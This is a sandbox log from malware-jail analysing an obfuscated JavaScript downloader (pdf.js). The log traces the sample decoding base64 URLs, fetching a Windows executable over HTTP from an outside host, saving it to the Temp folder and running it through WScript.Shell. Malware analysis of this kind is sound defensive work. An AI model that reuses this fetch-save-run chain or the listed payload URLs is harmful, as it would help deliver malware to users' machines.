4 Oct 14:04:05 - mailware-jail, a malware sandbox ver. 0.15
4 Oct 14:04:05 - ------------------------
4 Oct 14:04:05 - Arguments: --down malware/20171004/pdf.js -s malware/20171004/
4 Oct 14:04:05 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
4 Oct 14:04:05 - Malware files: malware/20171004/pdf.js
4 Oct 14:04:05 - Execution timeout set to: 60 seconds
4 Oct 14:04:05 - Output file for sandbox dump: sandbox_dump_after.json
4 Oct 14:04:05 - Output directory for generated files: malware/20171004/
4 Oct 14:04:05 - Download from remote server: Yes
4 Oct 14:04:05 - ==> Preparing Sandbox environment.
4 Oct 14:04:05 - => Executing: env/utils.js quitely
4 Oct 14:04:05 - => Executing: env/eval.js quitely
4 Oct 14:04:05 - => Executing: env/function.js quitely
4 Oct 14:04:05 - => Executing: env/wscript.js quitely
4 Oct 14:04:05 - => Executing: env/browser.js quitely
4 Oct 14:04:05 - => Executing: env/agents.js quitely
4 Oct 14:04:05 - => Executing: env/other.js quitely
4 Oct 14:04:05 - => Executing: env/console.js quitely
4 Oct 14:04:05 - ==> Executing malware file(s). =========================================
4 Oct 14:04:05 - => Executing: malware/20171004/pdf.js verbosely, reporting silent catches
4 Oct 14:04:05 - Saving: malware/20171004/malware_20171004_pdf.js
4 Oct 14:04:05 - Saving: malware/20171004/tr_malware_20171004_pdf.js
4 Oct 14:04:05 - WScript.scriptfullname = (string) 'malware/20171004/pdf.js'
4 Oct 14:04:05 - WScript.arguments = (object) 'malware/20171004/pdf.js,xyz'
4 Oct 14:04:05 - new Function(CEMENT,CEMENT2, CEMENT[CEMENT2]();) => Function[14]
4 Oct 14:04:05 - new Function(CEMENT,CEMENT, trigDA = new Function('vVREBFF3','return \"TVM=\".acetilenButan();');) => Function[15]
4 Oct 14:04:05 - Calling Function[15]() on sandbox
4 Oct 14:04:05 - new Function(vVREBFF3, return "TVM=".acetilenButan();) => Function[16]
4 Oct 14:04:05 - Returning: 'undefined'
4 Oct 14:04:05 - Calling Function[16]() on sandbox
4 Oct 14:04:05 - Returning: 'MS'
4 Oct 14:04:05 - new Function(HORN, var GALAXY = "chastity necessarily()";var kelso = "ADODB.Str32"; return kelso.replace("DILBO", "D").replace("32", "eam");) => Function[17]
4 Oct 14:04:05 - ActiveXObject(WScript.Shell)
4 Oct 14:04:05 - new WScript.Shell[18]
4 Oct 14:04:05 - >>> Silencing catch ReferenceError: ori_sel is not defined
at mimimix2 (malware/20171004/pdf.js:238:10)
at malware/20171004/pdf.js:250:1
at ContextifyScript.Script.runInContext (vm.js:32:29)
at Object.runInContext (vm.js:87:6)
at run_in_ctx (/home2/hynek/malware-jail/jailme.js:322:16)
at Object.<anonymous> (/home2/hynek/malware-jail/jailme.js:357:20)
at Module._compile (module.js:571:32)
at Object.Module._extensions..js (module.js:580:10)
at Module.load (module.js:488:32)
at tryModuleLoad (module.js:447:12)
4 Oct 14:04:05 - ActiveXObject(MSXML2.XMLHTTP)
4 Oct 14:04:05 - new MSXML2.XMLHTTP[19]
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].onreadystatechange = (undefined) 'undefined'
4 Oct 14:04:05 - Calling eval[1]('')
4 Oct 14:04:05 - WScript.Shell[18].ExpandEnvironmentStrings(%TEMP%) => C:\Users\User\AppData\Local\Temp
4 Oct 14:04:05 - Calling eval[2]('')
4 Oct 14:04:05 - new Function(Desdimonproducer_FROG2_a5,Desdimonproducer_FROG2HORDA5, return Desdimonproducer_FROG2_bChosteck.acetilenButan() + Desdimonproducer_FROG2_a5[Desdimonproducer_FROG2HORDA5].acetilenButan();) => Function[20]
4 Oct 14:04:05 - Calling Function[20](CEMENTbXlzCEMENTdXNoaS5pdC91eWl0ZnU2NXV5Pw==,CEMENTeW9tYTg4OC5jb20vdCEMENTXlpdGZ1NjV1eT8=,YWltb25pbm8uaW5mby9wNjYvdXlpdGZ1NjV1eQ==CEMENTcmVzdGF1cmFudGVsYnVybGFkZXJvLmNvbS91eWCEMENTl0ZnU2NXV5Pw==,,CEMENT, 0) on sandbox
4 Oct 14:04:05 - Returning: 'http://mysushi.it/uyitfu65uy?'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].open(GET,http://mysushi.it/uyitfu65uy??UDqQmLVi=UDqQmLVi,false)
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].method = (string) 'GET'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].url = (string) 'http://mysushi.it/uyitfu65uy??UDqQmLVi=UDqQmLVi'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].async = (boolean) 'false'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].setRequestHeader(User-Agent, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0))
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].send(undefined)
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].method.get() => (string) 'GET'
4 Oct 14:04:05 - MSXML2.XMLHTTP[19].url.get() => (string) 'http://mysushi.it/uyitfu65uy??UDqQmLVi=UDqQmLVi'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].status = (number) '200'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].readystate = (number) '4'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].statustext = (string) 'OK'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].responsebody = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].allresponseheaders = (string) '{"server":"nginx","date":"Wed, 04 Oct 2017 12:04:05 GMT","content-type":"text/plain","content-length":"588800","last-modified":"Tue, 03 Oct 2017 15:45:19 GMT","connection":"close","etag":"\"59d3b08f-8fc00\"","x-powered-by":"PleskLin","accept-ranges": ... (truncated)'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].status.get() => (number) '200'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].allresponseheaders.get() => (string) '{"server":"nginx","date":"Wed, 04 Oct 2017 12:04:05 GMT","content-type":"text/plain","content-length":"588800","last-modified":"Tue, 03 Oct 2017 15:45:19 GMT","connection":"close","etag":"\"59d3b08f-8fc00\"","x-powered-by":"PleskLin","accept-ranges": ... (truncated)'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].statustext.get() => (string) 'OK'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].onreadystatechange.get() => (undefined) 'undefined'
4 Oct 14:04:06 - MSXML2.XMLHTTP[19].responsebody.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - Calling Function[17]() on sandbox
4 Oct 14:04:06 - Returning: 'ADODB.Stream'
4 Oct 14:04:06 - ActiveXObject(ADODB.Stream)
4 Oct 14:04:06 - new ADODB_Stream[21]
4 Oct 14:04:06 - new Function(CEMENT,CEMENT2, CEMENT['write'](CEMENT2);) => Function[22]
4 Oct 14:04:06 - Calling Function[14](ADODB_Stream[21], open) on sandbox
4 Oct 14:04:06 - ADODB_Stream[21].Open()
4 Oct 14:04:06 - Returning: 'undefined'
4 Oct 14:04:06 - ADODB_Stream[21].type = (number) '1'
4 Oct 14:04:06 - Calling Function[22](ADODB_Stream[21], MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"??????????????? ... (truncated)) on sandbox
4 Oct 14:04:06 - ADODB_Stream[21].content = (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - ADODB_Stream[21].Write(str) - 588800 bytes
4 Oct 14:04:06 - ADODB_Stream[21].size = (number) '588800'
4 Oct 14:04:06 - Returning: 'undefined'
4 Oct 14:04:06 - ADODB_Stream[21].position = (number) '0'
4 Oct 14:04:06 - ADODB_Stream[21].SaveToFile(C:\Users\User\AppData\Local\Temp/UDqQmLVi2.exe, 2)
4 Oct 14:04:06 - ADODB_Stream[21].content.get() => (object) 'MZ??????????????????????@???????????????????????????????????????????????!??L?!This program cannot be run in DOS mode.???$???????PE??L???E3?W?????????????????????R???????*????????????@??????????????????????????0??????"????????????????????????????????? ... (truncated)'
4 Oct 14:04:06 - ADODB_Stream[21].Close()
4 Oct 14:04:06 - WScript.Shell[18].Run(C:\Users\User\AppData\Local\Temp/UDqQmLVi2.exe, 0, false)
4 Oct 14:04:06 - ==> Cleaning up sandbox.
4 Oct 14:04:06 - ==> Script execution finished, dumping sandbox environment to a file.
4 Oct 14:04:06 - The sandbox context has been saved to: sandbox_dump_after.json
4 Oct 14:04:06 - Saving: malware/20171004/eval1.js
4 Oct 14:04:06 - Saving: malware/20171004/eval2.js
4 Oct 14:04:06 - Saving: malware/20171004/Function[14].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[15].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[16].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[17].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[20].js
4 Oct 14:04:06 - Saving: malware/20171004/Function[22].js
4 Oct 14:04:06 - Saving: malware/20171004/C__Users_User_AppData_Local_Temp_UDqQmLVi2.exe
4 Oct 14:04:06 - Saving: malware/20171004/urls.json